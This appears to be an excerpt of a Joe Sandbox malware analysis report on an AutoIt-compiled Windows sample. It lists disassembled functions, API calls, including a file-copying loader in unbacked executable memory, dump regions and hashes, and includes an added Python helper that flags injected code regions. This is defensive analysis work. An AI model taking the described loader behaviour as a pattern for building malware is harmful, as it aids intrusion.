                                          • 1028: 115366d-1153687; ReadFile → 1030, 1031
                                          • 1029: 115364b-1153668 → 1021
                                          • 1030: 1153689-11536a6 → 1021
                                          • 1031: 11536ab-11536af → 1032, 1033
                                          • 1032: 11536b1-11536ce → 1021
                                          • 1033: 11536d0-11536e7; WriteFile → 1036, 1037
                                          • 1036: 1153712-1153737; CloseHandle, VirtualFree → 1021
                                          • 1037: 11536e9-1153710 → 1021
                                          Longest path: 1016 → 1019 → 1023 → 1025 → 1028 → 1031 → 1033 → 1036 → 1021, i.e. CreateFileW, VirtualAlloc, CreateFileW, ReadFile, WriteFile, CloseHandle, VirtualFree: open one file (the recorded call uses GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING and FILE_ATTRIBUTE_NORMAL, see the APIs entry below), allocate a buffer, open a second file, read into the buffer, write it out, then release the handle and the buffer. Every other path branches to block 1021 directly after one of the API blocks, consistent with a return-value check after each call. Note that this routine lives in the 0x1152000 region, which is not backed by the PE image (based on PE: false).
                                          APIs
                                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 011535CD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                          • Instruction ID: ee5315d1df14937914d873b0fdbed06b4a61453177cc85cd190a15a465826940
                                          • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                          • Instruction Fuzzy Hash: FA511775A50249FBEB64DFA4CC49FDE7778BF48740F108508FA2AEB280DB7496408B60

                                          Control-flow Graph

                                          Basic blocks (id: address range; calls and APIs; successors), recovered from the graph data:
                                          • 1046: dd73e5-dd7405; call e01b90 → 1049, 1050
                                          • 1049: dd740b-dd7438; call dd48ae, call df09d5, call dd716b, call dd69ca (no successors recorded)
                                          • 1050: e0ee4b-e0eeb4; call df3020; 7516D0D0 (a COMDLG32 import listed only by address, see the APIs entry below) → 1056, 1057
                                          • 1056: e0eeb6 → 1057
                                          • 1057: e0eebd-e0eec6; call dd7d2c → 1060
                                          • 1060: e0eecb → 1060 (self-loop)
                                          APIs
                                          • _memset.LIBCMT ref: 00E0EE62
                                          • 7516D0D0.COMDLG32(?), ref: 00E0EEAC
                                            • Part of subcall function 00DD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD48A1,?,?,00DD37C0,?), ref: 00DD48CE
                                            • Part of subcall function 00DF09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DF09F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: NamePath$7516FullLong_memset
                                          • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
                                          • API String ID: 3926756254-1954568251
                                          • Opcode ID: 2a1725a1467d156c298680697ead5bda8bf45a5b5fcd771d471a2e7b127ff9c7
                                          • Instruction ID: 3e42589cfcc196b8a8274dc7ec2e4958414260c66298947d8ece5ddd5006e569
                                          • Opcode Fuzzy Hash: 2a1725a1467d156c298680697ead5bda8bf45a5b5fcd771d471a2e7b127ff9c7
                                          • Instruction Fuzzy Hash: E2218171A0025C9BCB159F94C845BFE7BF99F49314F04805BE509B7382DBB4998A8FB1
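The first function entry above lives in region 01152000, which the report records as "based on PE: false" with protection 00000040 and type 00020000 (PAGE_EXECUTE_READWRITE, MEM_PRIVATE), while the AutoIt runtime functions live in the image mapped at 00DD0000 (type 01000000, MEM_IMAGE). The Python below is added here as a worked example and is not part of the Joe Sandbox report or its tooling: it parses the "Source File" lines, decodes the protection and type fields of the dump name using the winnt.h constants, and flags executable regions that are neither MEM_IMAGE nor PE-backed, the usual footprint of unpacked or injected code. The meaning of the other dump-name fields is not stated on the page and is left uninterpreted; the two sample lines are copied from the entries above.

```python
"""Triage helper for the 'Source File: ... .sdmp' lines of a Joe Sandbox
function listing: decode the memory-region attributes encoded in the dump
name and flag executable regions that are not backed by a mapped PE image."""
import re
from dataclasses import dataclass
from typing import List

# Protection and type values from winnt.h (MEMORY_BASIC_INFORMATION.Protect / .Type).
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
PAGE_READWRITE, PAGE_WRITECOPY = 0x04, 0x08
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000

PROTECT_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}
EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
WRITABLE = {PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

# Dump-name layout as it appears in the report. Only the base address (field 4),
# the protection (field 5) and the memory type (field 7) are interpreted; the
# remaining fields are not explained on the page and are captured but ignored.
SDMP_RE = re.compile(
    r"(?P<f1>[0-9A-Fa-f]{8})\.(?P<f2>[0-9A-Fa-f]{8})\.(?P<f3>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<f6>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp"
)
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)


@dataclass(frozen=True)
class Region:
    dump_name: str
    base: int
    offset: int
    protect: int
    mem_type: int
    pe_backed: bool

    @property
    def executable(self) -> bool:
        # Low byte holds the PAGE_* value; PAGE_GUARD / PAGE_NOCACHE modifiers sit above it.
        return (self.protect & 0xFF) in EXECUTABLE

    @property
    def writable(self) -> bool:
        return (self.protect & 0xFF) in WRITABLE

    @property
    def unbacked_executable(self) -> bool:
        # Executable code that is neither a mapped image nor recognised as a PE:
        # the footprint of unpacked or injected code (as for region 01152000 above).
        return self.executable and self.mem_type != MEM_IMAGE and not self.pe_backed

    def describe(self) -> str:
        prot = PROTECT_NAMES.get(self.protect & 0xFF, hex(self.protect))
        typ = TYPE_NAMES.get(self.mem_type, hex(self.mem_type))
        backing = "PE-backed" if self.pe_backed else "not PE-backed"
        if self.unbacked_executable:
            verdict = "executable and not image-backed: likely unpacked or injected code"
        elif self.executable:
            verdict = "executable image-backed module code"
        else:
            verdict = "non-executable data"
        return f"{self.base:#010x} {prot} {typ} {backing}: {verdict}"


def parse_source_line(line: str) -> Region:
    """Parse one 'Source File: ...' line of the report into a Region."""
    m = SOURCE_RE.search(line)
    if m is None:
        raise ValueError(f"not a Source File line: {line!r}")
    f = SDMP_RE.search(m.group("name"))
    if f is None:
        raise ValueError(f"unexpected dump name: {m.group('name')!r}")
    return Region(
        dump_name=m.group("name"),
        base=int(f.group("base"), 16),
        offset=int(m.group("offset"), 16),
        protect=int(f.group("protect"), 16),
        mem_type=int(f.group("type"), 16),
        pe_backed=m.group("pe") == "true",
    )


def triage(lines: List[str]) -> List[Region]:
    """Parse every Source File line and return the regions, flagged ones first."""
    regions = [parse_source_line(line) for line in lines if "Source File:" in line]
    return sorted(regions, key=lambda r: not r.unbacked_executable)


# Sample input: the two Source File lines copied from the function entries above.
REPORT_LINES = [
    "Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false",
    "Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true",
]

if __name__ == "__main__":
    for region in triage(REPORT_LINES):
        print(region.describe())
```

Run against a whole report, the flagged-first ordering puts the regions worth dumping and scanning (here 01152000, where the CreateFileW/VirtualAlloc/ReadFile/WriteFile loader above executes) ahead of the AutoIt runtime's own image sections.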

                                          Control-flow Graph
                                          • Summary: single basic block dd39e7-dd3a57; calls: CreateWindowExW ×2, ShowWindow ×2
                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DD3A15
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DD3A36
                                          • ShowWindow.USER32(00000000,?,?), ref: 00DD3A4A
                                          • ShowWindow.USER32(00000000,?,?), ref: 00DD3A53
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 1ed7a3bb1856d81ad4e8072e535e0d2f8a8679c10627d8c0a1939e5b3093264b
                                          • Instruction ID: 3448143d347cb0a1316ea24cb7e9027df1b38bbe57fdaa0f68f84d2073dfa044
                                          • Opcode Fuzzy Hash: 1ed7a3bb1856d81ad4e8072e535e0d2f8a8679c10627d8c0a1939e5b3093264b
                                          • Instruction Fuzzy Hash: DAF0D471641290BEEA311B27AC49E672E7DE7CAF51B00412BFA04B61B0C6A61859DAB0

                                          Control-flow Graph
                                          • Summary: basic blocks dd410d-dd4205 and e0d5dd-e0d633; calls in graph order: dd7b76, dd7d2c, LoadStringW, dd7c8e, dd7143, dd7e0b, dd81a7, df3020, dd463e, df2ffc, Shell_NotifyIconW, dd5a64
                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E0D5EC
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          • _memset.LIBCMT ref: 00DD418D
                                          • _wcscpy.LIBCMT ref: 00DD41E1
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DD41F1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                          • String ID: Line:
                                          • API String ID: 3942752672-1585850449
                                          • Opcode ID: 7a6e08f6113983b5753ede94f0fbb4c7043e05c96f92a29aa44b0d357427f111
                                          • Instruction ID: 96f223edf948a3e02e9e4b39ee395476801b368e581457323143df8d0b9d4661
                                          • Opcode Fuzzy Hash: 7a6e08f6113983b5753ede94f0fbb4c7043e05c96f92a29aa44b0d357427f111
                                          • Instruction Fuzzy Hash: 7E31AD71008304AFD721EB60DC46BEB77ECAF54304F104A1BF599A22A1EB70A648C7B6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                          • Instruction ID: 90518300f677c26a8ca49ae4fdd0fc9f61d91d7abb5f84b2b8d926655cf5f8d5
                                          • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                          • Instruction Fuzzy Hash: 1951B230A00B0DDBDB249F69E88467E77A1AF40320F2AC729FB35962D8D7709D518B60
                                          APIs
                                            • Part of subcall function 00DD4F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DD4F6F
                                          • _free.LIBCMT ref: 00E0E68C
                                          • _free.LIBCMT ref: 00E0E6D3
                                            • Part of subcall function 00DD6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DD6D0D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                          • API String ID: 2861923089-1757145024
                                          • Opcode ID: 8290220c052d22404430c24df27c19001de81a1936a94fb9c6f8d580758cce05
                                          • Instruction ID: c02ed364f655472c363ec0b882f813144d8af75efb8727a3257abc3b4c673d74
                                          • Opcode Fuzzy Hash: 8290220c052d22404430c24df27c19001de81a1936a94fb9c6f8d580758cce05
                                          • Instruction Fuzzy Hash: D1917A71910219AFCF14EFA4DC919EDBBB4FF18314F14586AE815BB3A1EB31A944CB60
                                          APIs
                                            • Part of subcall function 01154F48: Sleep.KERNELBASE(000001F4), ref: 01154F59
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011551CD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: H9KFVTFG66LQGAQQO3DJKC1LWA85
                                          • API String ID: 2694422964-3168977971
                                          • Opcode ID: c32f09c2ec4a4f8d51032fa737d7cfb896d4e9bc6c648bafcc9ef62b0a8fb45b
                                          • Instruction ID: a83c6998e373de8d80125211f29d6da3c33e11a244fb537e96f34acd254f77b6
                                          • Opcode Fuzzy Hash: c32f09c2ec4a4f8d51032fa737d7cfb896d4e9bc6c648bafcc9ef62b0a8fb45b
                                          • Instruction Fuzzy Hash: 2871A430D04288DBEF15DBB8C8487DEBB75AF15304F004199E6587B2C1D7BA5B45CBA6
                                          APIs
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DF03D3
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DF03DB
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DF03E6
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DF03F1
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DF03F9
                                            • Part of subcall function 00DF03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DF0401
                                            • Part of subcall function 00DE6259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00DE62B4
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DDFB2D
                                          • OleInitialize.OLE32(00000000), ref: 00DDFBAA
                                          • CloseHandle.KERNEL32(00000000), ref: 00E149F2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                          • String ID: %
                                          • API String ID: 3094916012-2291192146
                                          • Opcode ID: ded58c0e1268e050582210d713a986520fe818d83d3504cdfb95ac71353928c0
                                          • Instruction ID: 6708499c2837ecbd5570ef226f8bdae3335089068eb09ca2952dec55cae0c6a4
                                          • Opcode Fuzzy Hash: ded58c0e1268e050582210d713a986520fe818d83d3504cdfb95ac71353928c0
                                          • Instruction Fuzzy Hash: 3A81B7B09042409FCB84EFBBE9526597BE4FB98348711956BD028E7362EB31840CCF62
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DD35A1,SwapMouseButtons,00000004,?), ref: 00DD35D4
                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00DD35A1,SwapMouseButtons,00000004,?,?,?,?,00DD2754), ref: 00DD35F5
                                          • RegCloseKey.KERNELBASE(00000000,?,?,00DD35A1,SwapMouseButtons,00000004,?,?,?,?,00DD2754), ref: 00DD3617
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: 1291c8d4b67c50f70777b2e711532b84b0c7e9702134fb1e4c8b013e7190d827
                                          • Instruction ID: 8742b17b883e9a40efdaba182e4c62ff1299ba80c7c46e370a51fac746c03fb8
                                          • Opcode Fuzzy Hash: 1291c8d4b67c50f70777b2e711532b84b0c7e9702134fb1e4c8b013e7190d827
                                          • Instruction Fuzzy Hash: 49114575610208FFDB208F65DC80EAFBBB8EF04740F04886AE805E7310E271DE449BA1
                                          APIs
                                            • Part of subcall function 00DD5045: _fseek.LIBCMT ref: 00DD505D
                                            • Part of subcall function 00E399BE: _wcscmp.LIBCMT ref: 00E39AAE
                                            • Part of subcall function 00E399BE: _wcscmp.LIBCMT ref: 00E39AC1
                                          • _free.LIBCMT ref: 00E3992C
                                          • _free.LIBCMT ref: 00E39933
                                          • _free.LIBCMT ref: 00E3999E
                                            • Part of subcall function 00DF2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00DF9C64), ref: 00DF2FA9
                                            • Part of subcall function 00DF2F95: GetLastError.KERNEL32(00000000,?,00DF9C64), ref: 00DF2FBB
                                          • _free.LIBCMT ref: 00E399A6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID:
                                          • API String ID: 1552873950-0
                                          • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                          • Instruction ID: e965bc330dbb77323a0de7e6da3955d1c6df679637be9b2c815203815ea8dcda
                                          • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                          • Instruction Fuzzy Hash: 295150B1904218AFDF249F64DC45AAEBBB9EF48314F1044AEF609A7341DB715E80CF69
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                          • Instruction ID: d1415dc369f92b450b351ac938ac4afca48ac8eb710ac1d431d9948ac37a6103
                                          • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                          • Instruction Fuzzy Hash: 8141C57070060E9BDB188E69C88097F77A6EF80364B2AC13DEA55C7650D770DD408B74
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: AU3!P/$EA06
                                          • API String ID: 4104443479-182974850
                                          • Opcode ID: 24ce06fc4974b1506e28f3f95b320af8aa33350e390b502a7d60a70513ef8ef3
                                          • Instruction ID: d1e75f288174bd9a5714eef97a841a4c0a915b38a07f37f9ed42e18fc2dab237
                                          • Opcode Fuzzy Hash: 24ce06fc4974b1506e28f3f95b320af8aa33350e390b502a7d60a70513ef8ef3
                                          • Instruction Fuzzy Hash: 3E414C61A041587BDF215B64DC91BBE7FA6EF45300F6C4067F882AB386C671DD8487B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
